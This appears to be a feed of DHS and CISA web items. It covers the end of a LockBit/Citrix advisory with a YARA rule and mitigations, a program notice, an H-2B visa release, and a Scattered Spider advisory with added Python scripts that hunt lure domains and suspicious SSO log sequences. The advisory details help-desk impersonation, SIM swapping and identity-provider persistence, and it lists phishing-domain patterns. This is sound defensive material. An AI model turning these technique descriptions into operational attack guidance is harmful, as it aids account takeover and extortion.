            $s1 = { 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? ?? }
        condition:
            uint16(0) == 0x5A4D
            and filesize >= 5KB
            and pe.imports("mscoree.dll")
            and all of them
    }

INCIDENT RESPONSE

Organizations are encouraged to assess Citrix software and their systems for evidence of compromise, and to hunt for malicious activity (see the Additional Resources section). If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform all tasks associated with the web management software, including installing malicious code.

If a potential compromise is detected, organizations should:

  1. Quarantine or take offline potentially affected hosts.
  2. Reimage compromised hosts.
  3. Create new account credentials.
  4. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
    • Note: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms.
  5. Report the compromise to FBI Internet Crime Complaint Center (IC3) at IC3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or 888-282-0870). State, local, tribal, or territorial government (SLTT) entities can also report to MS-ISAC (SOC@cisecurity.org or 866-787-4722). If outside of the US, please contact your national cyber center.

MITIGATIONS

These mitigations apply to all critical infrastructure organizations and network defenders using Citrix NetScaler ADC and Gateway software. CISA and the authoring organizations recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of exploitation, such as threat actors leveraging unpatched vulnerabilities within Citrix NetScaler appliances, and thereby strengthen the security posture of their customers.

For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.

The authoring organizations of this CSA recommend that organizations implement the mitigations below to improve their cybersecurity posture on the basis of the observed threat actor activity and to reduce the risk of compromise associated with Citrix CVE-2023-4966 and LockBit 3.0 ransomware and ransomware affiliates. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Isolate NetScaler ADC and Gateway appliances for testing until patching is ready and deployable.
  • Secure remote access tools by:
    • Implementing application controls to manage and control the execution of software, including allowlisting remote access programs. Application controls should prevent the installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
  • Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
  • Restrict the use of PowerShell, using Group Policy, and only grant access to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems (OSs) should be permitted to use PowerShell [CPG 2.E].
  • Update Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T].
  • Enable enhanced PowerShell logging [CPG 2.T, 2.U].
    • PowerShell logs contain valuable data, including historical OS and registry interaction and possible TTPs of a threat actor’s PowerShell use.
    • Ensure PowerShell instances, using the latest version, have module, script block, and transcription logging enabled (enhanced logging).
    • The two logs that record PowerShell activity are the PowerShell Windows Event Log and the PowerShell Operational Log. FBI and CISA recommend turning on these two Windows Event Logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible.
  • Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies.
    • Use longer passwords consisting of at least 15 characters [CPG 2.B].
    • Store passwords in hashed format using industry-recognized password managers.
    • Add password user “salts” to shared login credentials.
    • Avoid reusing passwords [CPG 2.C].
    • Implement multiple failed login attempt account lockouts [CPG 2.G].
    • Disable password “hints.”
    • Require administrator credentials to install software.
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
    • Upgrade vulnerable NetScaler ADC and Gateway appliances to the latest version available to lower the risk of compromise.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 6 and Table 7).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and the authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with LockBit 3.0 affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA and authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring organizations.

ACKNOWLEDGEMENTS

Boeing contributed to this CSA.

REFERENCES

[1] NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966

[2] Investigation of Session Hijacking via Citrix NetScaler ADC and Gateway Vulnerability (CVE-2023-4966)

[3] What is Mshta, How Can it Be Used and How to Protect Against it (McAfee)

VERSION HISTORY

November 21, 2023: Initial version.

2024 AEP Info Session #1

Source: US Department of Homeland Security

The Department of Homeland Security and the Office of the Director of National Intelligence invite you to attend the upcoming 2024 Public-Private Analytic Exchange Program (AEP) Virtual Info Sessions.

The AEP is sponsored by the Department of Homeland Security’s (DHS) Office of Intelligence and Analysis (I&A), on behalf of the Office of the Director of National Intelligence. DHS I&A Private Sector Engagement facilitates collaborative partnerships between members of the private sector and experienced U.S. government analysts to form several teams to address national security and homeland security issues. Participants work to create UNCLASSIFIED joint analytic deliverables of interest to both the private sector and the U.S. government. You must be a U.S. Citizen to participate.

The info sessions will include a detailed overview of the AEP, importance of the program, relationships built between the public and private sector, and how to apply for the 2024 AEP. You will hear former AEP participants share their experience. We encourage everyone to come with questions for discussion, as the AEP staff looks forward to socializing the program with you.

Session #1: Tuesday, November 21, 2023, 12:00 pm to 12:45 pm EDT. Register here.

If you are unable to attend this session, the AEP staff will host four additional info sessions on November 28th, November 30th, December 12th, and December 14th at 12:00pm EDT. Please search the DHS events page for information on how to join those sessions. Please note that each session will provide the same information, so it is only necessary to participate in one of them.

We are excited to promote this incredible program. We invite partners to ask questions during the call. Please share this announcement with colleagues across the public and private sector. We hope you can join!

For more information, check out our website.

Please contact the AEP Staff at AEP@hq.dhs.gov with any questions.

USCIS Announces Availability of Additional H-2B Visas for Fiscal Year 2024

Source: US Department of Homeland Security

WASHINGTON – Today, the Department of Homeland Security (DHS), through the U.S. Citizenship and Immigration Services (USCIS), and the Department of Labor (DOL) published a temporary final rule making available an additional 64,716 H-2B temporary nonagricultural worker visas for fiscal year (FY) 2024, on top of the statutory cap of 66,000 H-2B visas that are available each fiscal year. American businesses in industries such as hospitality and tourism, landscaping, seafood processing, and more turn to seasonal and other temporary workers in the H-2B program to help them meet demand from consumers. The supplemental visa allocation will help address the need for these workers in areas where too few U.S. workers are available, helping contribute to the American economy. The temporary final rule also advances the Biden Administration’s pledge, under the Los Angeles Declaration for Migration and Protection, to expand lawful pathways as an alternative to irregular migration.  

By making these supplemental visas available at the outset of FY 2024, the Departments will help ensure U.S. businesses with workforce needs are able to plan ahead and find the seasonal and temporary workers they need. At the same time, DHS and DOL are reinforcing robust protections for U.S. and foreign workers alike, including by ensuring that employers first seek out and recruit American workers for the jobs to be filled, as the H-2B program requires, and that foreign workers hired are protected from unscrupulous employers. Recently, both DHS and DOL proposed regulations to further strengthen worker protections in the H-2A and H-2B visa programs, and the White House-led H-2B Worker Protection Taskforce released a report (PDF) detailing new actions to be taken by Federal agencies to strengthen protections for vulnerable H-2B and similarly situated U.S. workers. 

The H-2B supplemental includes an allocation of 20,000 visas to workers from Colombia, Costa Rica, Ecuador, El Salvador, Guatemala, Haiti, and Honduras. This country-specific allocation is part of the Biden-Harris Administration’s efforts to build a safe, orderly, and humane immigration system that includes expanding lawful pathways for migration while strengthening consequences for those without a legal basis to remain in the United States. 
 
In addition to the 20,000 country-specific allocation, 44,716 supplemental visas will be available to returning workers who received H-2B visas or were otherwise granted H-2B status during one of the last three fiscal years. The rule allocates these supplemental visas for returning workers between the first half and second half of the fiscal year to account for the need for additional seasonal and other temporary workers over the course of the year, with a portion of the second half allocation reserved to meet the demand for workers during the summer season. The semiannual cap of 33,000 H-2B visas authorized under the Immigration and Nationality Act (statutory cap) for the first half of FY 2024 was reached on October 11, 2023.

The supplemental H-2B visas have been divided into the following allocations:

  • First half of FY 2024 (October 1 to March 31): 20,716 visas are immediately available to returning workers – those who were issued H-2B visas or held H-2B status in FY 2021, FY 2022, or FY 2023, regardless of country of nationality.  These petitions must request employment start dates on or before March 31, 2024.

  • Early second half of FY 2024 (April 1 to May 14): 19,000 visas are limited to returning workers – those who were issued H-2B visas or held H-2B status in FY 2021, FY 2022, or FY 2023, regardless of country of nationality. These early second half of FY 2024 petitions must request employment start dates from April 1, 2024, to May 14, 2024.  

  • Late second half of FY 2024 (May 15 to September 30): 5,000 visas are limited to returning workers – those who were issued H-2B visas or held H-2B status in FY 2021, FY 2022, or FY 2023, regardless of country of nationality. These late second half of FY 2024 petitions must request employment start dates from May 15, 2024, to Sept. 30, 2024.

  • For the entirety of FY 2024: 20,000 visas are reserved for nationals of El Salvador, Guatemala, Honduras, Haiti, Colombia, Ecuador, and Costa Rica, regardless of whether such nationals are returning workers. Employers requesting an employment start date in the first half of FY 2024 may file such petitions immediately after the publication of this temporary final rule.  

The H-2B program permits employers to temporarily hire noncitizens to perform nonagricultural labor or services in the United States. The employment must be of a temporary nature, such as a one-time occurrence, seasonal need, or intermittent need. Employers seeking H-2B workers must take a series of steps to test the U.S. labor market. They must obtain certification from DOL that there are not enough U.S. workers who are able, willing, qualified, and available to perform the temporary work for which they seek a prospective foreign worker, and that employing H-2B workers will not adversely affect the wages and working conditions of similarly employed U.S. workers. The maximum period of stay in H-2B classification is three years. A person who has held H-2B nonimmigrant status for a total of three years must depart and remain outside of the United States for an uninterrupted period of three months before seeking readmission as an H-2B nonimmigrant.

DHS and DOL are committed to protecting all H-2B workers from exploitation and abuse, and to ensuring, consistent with law, that employers do not refuse to hire or appropriately recruit U.S. workers who are able, willing, qualified, and available to perform the temporary work. The temporary final rule implementing this allocation features several provisions to protect both U.S. and H-2B workers.  

Petitions requesting supplemental allocations under this rule must be filed at the USCIS Texas Service Center. Petitions filed under the supplemental allocations in this rule at any location other than the Texas Service Center will be rejected, and the filing fees will be returned. 

Scattered Spider

Source: US Department of Homeland Security

SUMMARY

The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to recent activity by Scattered Spider threat actors against the commercial facilities sectors and subsectors. This advisory provides tactics, techniques, and procedures (TTPs) obtained through FBI investigations as recently as November 2023.

Scattered Spider is a cybercriminal group that targets large companies and their contracted information technology (IT) help desks. Scattered Spider threat actors, per trusted third parties, have typically engaged in data theft for extortion and have also been known to utilize BlackCat/ALPHV ransomware alongside their usual TTPs.

The FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of a cyberattack by Scattered Spider actors.


TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See the MITRE ATT&CK® Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Overview

Scattered Spider (also known as Starfraud, UNC3944, Scatter Swine, and Muddled Libra) engages in data extortion and several other criminal activities.[1] Scattered Spider threat actors are considered experts in social engineering and use multiple social engineering techniques, especially phishing, push bombing, and subscriber identity module (SIM) swap attacks, to obtain credentials, install remote access tools, and/or bypass multi-factor authentication (MFA). According to public reporting, Scattered Spider threat actors have [2],[3],[4]:

  • Posed as company IT and/or helpdesk staff using phone calls or SMS messages to obtain credentials from employees and gain access to the network [T1598],[T1656].
  • Posed as company IT and/or helpdesk staff to direct employees to run commercial remote access tools enabling initial access [T1204],[T1219],[T1566].
  • Posed as IT staff to convince employees to share their one-time password (OTP), an MFA authentication code.
  • Sent repeated MFA notification prompts leading to employees pressing the “Accept” button (also known as MFA fatigue) [T1621].[5]
  • Convinced cellular carriers to transfer control of a targeted user’s phone number to a SIM card they controlled, gaining control over the phone and access to MFA prompts.
  • Monetized access to victim networks in numerous ways including extortion enabled by ransomware and data theft [T1657].

After gaining access to networks, the FBI observed Scattered Spider threat actors using publicly available, legitimate remote access and tunneling tools. Table 1 lists legitimate tools that Scattered Spider repurposed for criminal activity. Note: The use of these legitimate tools alone is not indicative of criminal activity. Users should review the Scattered Spider indicators of compromise (IOCs) and TTPs discussed in this CSA to determine whether they have been compromised.

Table 1: Legitimate Tools Used by Scattered Spider

  Tool              | Intended Use
  Fleetdeck.io      | Enables remote monitoring and management of systems.
  Level.io          | Enables remote monitoring and management of systems.
  Mimikatz [S0002]  | Extracts credentials from a system.
  Ngrok [S0508]     | Enables remote access to a local web server by tunneling over the internet.
  Pulseway          | Enables remote monitoring and management of systems.
  Screenconnect     | Enables remote connections to network devices for management.
  Splashtop         | Enables remote connections to network devices for management.
  Tactical.RMM      | Enables remote monitoring and management of systems.
  Tailscale         | Provides virtual private networks (VPNs) to secure network communications.
  Teamviewer        | Enables remote connections to network devices for management.

In addition to using legitimate tools, Scattered Spider also uses malware as part of its TTPs. See Table 2 for some of the malware used by Scattered Spider.

Table 2: Malware Used by Scattered Spider

  Malware                                   | Use
  AveMaria (also known as WarZone [S0670])  | Enables remote access to a victim’s systems.
  Raccoon Stealer                           | Steals information including login credentials [TA0006], browser history [T1217], cookies [T1539], and other data.
  VIDAR Stealer                             | Steals information including login credentials, browser history, cookies, and other data.

Scattered Spider threat actors have historically evaded detection on target networks by using living off the land techniques and allowlisted applications to navigate victim networks, as well as frequently modifying their TTPs.

Notably, Scattered Spider threat actors have exfiltrated data [TA0010] after gaining access and threatened to release it without deploying ransomware; this includes exfiltration to multiple sites, including U.S.-based data centers and MEGA[.]NZ [T1567.002].

Recent Scattered Spider TTPs

New TTP – File Encryption

More recently, the FBI has identified Scattered Spider threat actors now encrypting victim files after exfiltration [T1486]. After exfiltrating and/or encrypting data, Scattered Spider threat actors communicate with victims via TOR, Tox, email, or encrypted applications.

Reconnaissance, Resource Development, and Initial Access

Scattered Spider intrusions often begin with broad phishing [T1566] and smishing [T1660] attempts against a target using victim-specific crafted domains, such as the domains listed in Table 3 [T1583.001].

Table 3: Domains Used by Scattered Spider Threat Actors

  Domains
  victimname-sso[.]com
  victimname-servicedesk[.]com
  victimname-okta[.]com

In most instances, Scattered Spider threat actors conduct SIM swapping attacks against users who respond to the phishing/smishing attempt. The threat actors then work to identify the personally identifiable information (PII) of the most valuable users that succumbed to the phishing/smishing, obtaining answers for those users’ security questions. After identifying usernames, passwords, and PII [T1589], and conducting SIM swaps, the threat actors use social engineering techniques [T1656] to convince IT help desk personnel to reset passwords and/or MFA tokens [T1078.002],[T1199],[T1566.004] to perform account takeovers against the users in single sign-on (SSO) environments.
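The domains in Table 3 follow a simple pattern (the victim’s name joined to an SSO-themed keyword), which makes them straightforward to hunt for in a newly-registered-domain or certificate transparency feed. The following scanner is an added example and not code from the advisory; the keywords beyond the three in Table 3, the naive registrable-label split, the allowlist, and the sample feed are assumptions.

```python
"""Flag newly observed domains that follow the victim-specific lure pattern from
Table 3 (<victimname>-sso, -servicedesk, -okta). Added example, not from the
advisory; extra keywords, the sample feed and the allowlist are assumptions."""
import re

TABLE3_KEYWORDS = ("sso", "servicedesk", "okta")
EXTRA_KEYWORDS = ("helpdesk", "vpn", "login", "mfa")   # assumption: other common SSO-themed lure words
KEYWORDS = TABLE3_KEYWORDS + EXTRA_KEYWORDS

# Constructed feed, as it might arrive from a new-domain or CT-log source (some entries defanged).
SAMPLE_FEED = [
    "victimname-sso[.]com",
    "victimname-servicedesk.com",
    "VICTIMNAME-okta.com",
    "sso.victimname.com",          # the organization's own SSO host
    "victimname.sso-portal.com",   # org name as a subdomain of a keyword domain
    "victimnamehelpdesk.net",      # separator dropped
    "victimname-news.com",         # org name but no SSO keyword
    "example.org",
]


def normalize(domain):
    """Lower-case, refang '[.]', drop a trailing dot and a leading 'www.'."""
    d = domain.strip().lower().replace("[.]", ".").rstrip(".")
    return d[4:] if d.startswith("www.") else d


def registrable_label(domain):
    """Second-level label. Assumption: naive split, so multi-part public suffixes
    such as .co.uk are not handled; use a public-suffix library in production."""
    parts = normalize(domain).split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def classify(domain, org, allowlist):
    """Return a hit dict if the domain looks like an org-themed SSO lure, else None."""
    d = normalize(domain)
    org = org.lower()
    if d in allowlist or any(d.endswith("." + a) for a in allowlist):
        return None                                  # the organization's own domains
    label = registrable_label(d)
    org_re = re.escape(org)
    for kw in KEYWORDS:
        # victimname-sso / victimnamesso / sso-victimname as the registrable label
        if re.fullmatch(rf"{org_re}[-_]?{kw}|{kw}[-_]?{org_re}", label):
            return {"domain": d, "keyword": kw, "pattern": "org+keyword registrable label"}
    # Org name used as a subdomain of a keyword-bearing domain, e.g. victimname.sso-portal.com
    subdomains = d.split(".")[:-2]
    if org in subdomains:
        for kw in KEYWORDS:
            if kw in label:
                return {"domain": d, "keyword": kw, "pattern": "org as subdomain of keyword domain"}
    return None


def scan(feed, org, allowlist=frozenset()):
    """Run classify() over a feed and return the hits in feed order."""
    hits = []
    for raw in feed:
        hit = classify(raw, org, allowlist)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_FEED, "victimname", {"victimname.com"}):
        print(f"{hit['domain']:32} {hit['keyword']:12} {hit['pattern']}")
```

Hits should feed a takedown/blocking workflow and, more importantly, a watch on the help desk: a lure domain appearing for your organization is the usual precursor to the phone calls described in the next section.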

Execution, Persistence, and Privilege Escalation

Scattered Spider threat actors then register their own MFA tokens [T1556.006],[T1606] after compromising a user’s account to establish persistence [TA0003]. Further, the threat actors add a federated identity provider to the victim’s SSO tenant and activate automatic account linking [T1484.002]. The threat actors are then able to sign into any account by using a matching SSO account attribute. Because the threat actors control the added identity provider, they can choose an arbitrary value for this attribute, which allows them to escalate privileges [TA0004] and continue logging in even when passwords are changed [T1078]. Additionally, they leverage common endpoint detection and response (EDR) tools installed on the victim networks, using the tools’ remote-shell and command execution capabilities to elevate their access. They also deploy remote monitoring and management (RMM) tools [T1219] to maintain persistence.
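The chain described above (a help-desk-initiated MFA reset, the actor enrolling their own factor, then a federated identity provider added to the tenant) leaves a recognizable sequence in SSO audit logs. The hunt below over constructed log lines is an added example and not code from the advisory; the JSON event schema and the event-type names are assumptions, loosely modeled on Okta System Log naming, and must be mapped to whatever your identity provider emits.

```python
"""Hunt SSO audit logs for the persistence chain: help-desk MFA reset -> factor
enrolled from an IP the user has never used -> federated IdP created/updated.
Added example, not from the advisory. Event schema and type names are assumptions."""
import json
from datetime import datetime, timedelta

WINDOW = timedelta(hours=24)
RESET_TYPES = {"user.mfa.factor.reset_all", "user.account.reset_password"}
ENROLL_TYPE = "user.mfa.factor.activate"
IDP_TYPES = {"system.idp.lifecycle.create", "system.idp.lifecycle.update"}

# Constructed NDJSON sample. jdoe is the victim; asmith is a benign help-desk reset
# where the user re-enrolls from an address already in their history.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"time": "2023-11-01T09:00:00Z", "type": "user.session.start", "actor": "asmith", "ip": "203.0.113.7"},
    {"time": "2023-11-08T08:15:00Z", "type": "user.session.start", "actor": "jdoe", "ip": "203.0.113.5"},
    {"time": "2023-11-09T10:00:00Z", "type": "user.mfa.factor.reset_all", "actor": "helpdesk.admin", "target": "asmith", "ip": "203.0.113.2"},
    {"time": "2023-11-09T10:07:00Z", "type": "user.mfa.factor.activate", "actor": "asmith", "ip": "203.0.113.7"},
    {"time": "2023-11-10T14:02:11Z", "type": "user.mfa.factor.reset_all", "actor": "helpdesk.admin", "target": "jdoe", "ip": "203.0.113.2"},
    {"time": "2023-11-10T14:05:40Z", "type": "user.mfa.factor.activate", "actor": "jdoe", "ip": "198.51.100.23"},
    {"time": "2023-11-10T14:20:05Z", "type": "system.idp.lifecycle.create", "actor": "jdoe", "target": "Corp Federation IdP", "ip": "198.51.100.23"},
])


def parse_events(raw):
    """Parse NDJSON lines into dicts sorted by time (time becomes a datetime)."""
    events = []
    for line in raw.splitlines():
        if line.strip():
            e = json.loads(line)
            e["time"] = datetime.strptime(e["time"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(e)
    events.sort(key=lambda e: e["time"])
    return events


def hunt(events):
    """Return findings for the reset->enroll sequence and for any IdP change."""
    findings = []
    compromised = {}   # user -> time of the suspicious enrollment
    # Rule 1: a reset performed by someone other than the account owner, followed
    # within WINDOW by the owner enrolling a factor from an IP with no prior history.
    for i, reset in enumerate(events):
        if reset["type"] not in RESET_TYPES or reset["actor"] == reset.get("target"):
            continue
        user = reset["target"]
        prior_ips = {e["ip"] for e in events[:i] if e["actor"] == user}
        for later in events[i + 1:]:
            if later["time"] - reset["time"] > WINDOW:
                break
            if later["type"] == ENROLL_TYPE and later["actor"] == user and later["ip"] not in prior_ips:
                findings.append({"rule": "helpdesk_reset_then_new_ip_enroll", "severity": "high",
                                 "user": user, "reset_by": reset["actor"],
                                 "enroll_ip": later["ip"], "at": later["time"]})
                compromised[user] = later["time"]
                break
    # Rule 2: IdP create/update is rare in any tenant and is the step that lets the
    # actor log in as arbitrary accounts; critical when the acting account was just
    # flagged by rule 1, medium (review by hand) otherwise.
    for e in events:
        if e["type"] in IDP_TYPES:
            recent = e["actor"] in compromised and e["time"] - compromised[e["actor"]] <= WINDOW
            findings.append({"rule": "federated_idp_changed",
                             "severity": "critical" if recent else "medium",
                             "user": e["actor"], "idp": e.get("target"), "at": e["time"]})
    return findings


if __name__ == "__main__":
    for f in hunt(parse_events(SAMPLE_LOG)):
        print(f["severity"].upper(), f["rule"], f["user"], f["at"].isoformat())
```

The IP-history baseline is deliberately crude; in production, key it on ASN or device fingerprint and seed it from more than the log window, otherwise a user’s first login from home trips rule 1. Rule 2 should page regardless of severity: adding a federated identity provider is a change-controlled event in any well-run tenant.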

Discovery, Lateral Movement, and Exfiltration

Once persistence is established on a target network, Scattered Spider threat actors often perform discovery, specifically searching for SharePoint sites [T1213.002], credential storage documentation [T1552.001], VMware vCenter infrastructure [T1018], backups, and instructions for setting up/logging into Virtual Private Networks (VPN) [TA0007]. The threat actors enumerate the victim’s Active Directory (AD), perform discovery and exfiltration of victim’s code repositories [T1213.003], code-signing certificates [T1552.004], and source code [T1083],[TA0010]. Threat actors activate Amazon Web Services (AWS) Systems Manager Inventory [T1538] to discover targets for lateral movement [TA0007],[TA0008], then move to both preexisting [T1021.007] and actor-created [T1578.002] Amazon Elastic Compute Cloud (EC2) instances. In instances where the ultimate goal is data exfiltration, Scattered Spider threat actors use actor-installed extract, transform, and load (ETL) tools [T1648] to bring data from multiple data sources into a centralized database [T1074],[T1530]. According to trusted third parties, where more recent incidents are concerned, Scattered Spider threat actors may have deployed BlackCat/ALPHV ransomware onto victim networks—thereby encrypting VMware Elastic Sky X integrated (ESXi) servers [T1486].

To determine if their activities have been uncovered and maintain persistence, Scattered Spider threat actors often search the victim’s Slack, Microsoft Teams, and Microsoft Exchange online for emails [T1114] or conversations regarding the threat actor’s intrusion and any security response. The threat actors frequently join incident remediation and response calls and teleconferences, likely to identify how security teams are hunting them and proactively develop new avenues of intrusion in response to victim defenses. This is sometimes achieved by creating new identities in the environment [T1136] and is often upheld with fake social media profiles [T1585.001] to backstop newly created identities.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 4 through 17 for all referenced threat actor tactics and techniques in this advisory.

Table 4: Reconnaissance

  Technique Title | ID | Use
  Gather Victim Identity Information | T1589 | Scattered Spider threat actors gather usernames, passwords, and PII for targeted organizations.
  Phishing for Information | T1598 | Scattered Spider threat actors use phishing to obtain login credentials, gaining access to a victim’s network.

Table 5: Resource Development

  Technique Title | ID | Use
  Acquire Infrastructure: Domains | T1583.001 | Scattered Spider threat actors create domains for use in phishing and smishing attempts against targeted organizations.
  Establish Accounts: Social Media Accounts | T1585.001 | Scattered Spider threat actors create fake social media profiles to backstop newly created user accounts in a targeted organization.

Table 6: Initial Access

  Technique Title | ID | Use
  Phishing | T1566 | Scattered Spider threat actors use broad phishing attempts against a target to obtain information used to gain initial access. Scattered Spider threat actors have posed as helpdesk personnel to direct employees to install commercial remote access tools.
  Phishing (Mobile) | T1660 | Scattered Spider threat actors send SMS messages, known as smishing, when targeting a victim.
  Phishing: Spearphishing Voice | T1566.004 | Scattered Spider threat actors use voice communications to convince IT help desk personnel to reset passwords and/or MFA tokens.
  Trusted Relationship | T1199 | Scattered Spider threat actors abuse trusted relationships of contracted IT help desks to gain access to targeted organizations.
  Valid Accounts: Domain Accounts | T1078.002 | Scattered Spider threat actors obtain access to valid domain accounts to gain initial access to a targeted organization.

Table 7: Execution

  Technique Title | ID | Use
  Serverless Execution | T1648 | Scattered Spider threat actors use ETL tools to collect data in cloud environments.
  User Execution | T1204 | Scattered Spider threat actors impersonating helpdesk personnel direct employees to run commercial remote access tools, thereby enabling access to the victim’s network.

Table 8: Persistence

  Technique Title | ID | Use
  Persistence | TA0003 | Scattered Spider threat actors seek to maintain persistence on a targeted organization’s network.
  Create Account | T1136 | Scattered Spider threat actors create new user identities in the targeted organization.
  Modify Authentication Process: Multi-Factor Authentication | T1556.006 | Scattered Spider threat actors may modify MFA tokens to gain access to a victim’s network.
  Valid Accounts | T1078 | Scattered Spider threat actors abuse and control valid accounts to maintain network access even when passwords are changed.

Table 9: Privilege Escalation

  Technique Title | ID | Use
  Privilege Escalation | TA0004 | Scattered Spider threat actors escalate account privileges when on a targeted organization’s network.
  Domain Policy Modification: Domain Trust Modification | T1484.002 | Scattered Spider threat actors add a federated identity provider to the victim’s SSO tenant and activate automatic account linking.

Table 10: Defense Evasion

  Technique Title | ID | Use
  Modify Cloud Compute Infrastructure: Create Cloud Instance | T1578.002 | Scattered Spider threat actors will create cloud instances for use during lateral movement and data collection.
  Impersonation | T1656 | Scattered Spider threat actors pose as company IT and/or helpdesk staff to gain access to victims’ networks. Scattered Spider threat actors use social engineering to convince IT help desk personnel to reset passwords and/or MFA tokens.

Table 11: Credential Access

  Technique Title | ID | Use
  Credential Access | TA0006 | Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain login credentials.
  Forge Web Credentials | T1606 | Scattered Spider threat actors may forge MFA tokens to gain access to a victim’s network.
  Multi-Factor Authentication Request Generation | T1621 | Scattered Spider sends repeated MFA notification prompts to lead employees to accept the prompt and gain access to the target network.
  Steal Web Session Cookie | T1539 | Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain browser cookies.
  Unsecured Credentials: Credentials in Files | T1552.001 | Scattered Spider threat actors search for insecurely stored credentials on victims’ systems.
  Unsecured Credentials: Private Keys | T1552.004 | Scattered Spider threat actors search for insecurely stored private keys on victims’ systems.

Table 12: Discovery

  Technique Title | ID | Use
  Discovery | TA0007 | Upon gaining access to a targeted network, Scattered Spider threat actors seek out SharePoint sites, credential storage documentation, VMware vCenter infrastructure, and backups, and enumerate AD to identify useful information to support further operations.
  Browser Information Discovery | T1217 | Scattered Spider threat actors use tools (e.g., Raccoon Stealer) to obtain browser histories.
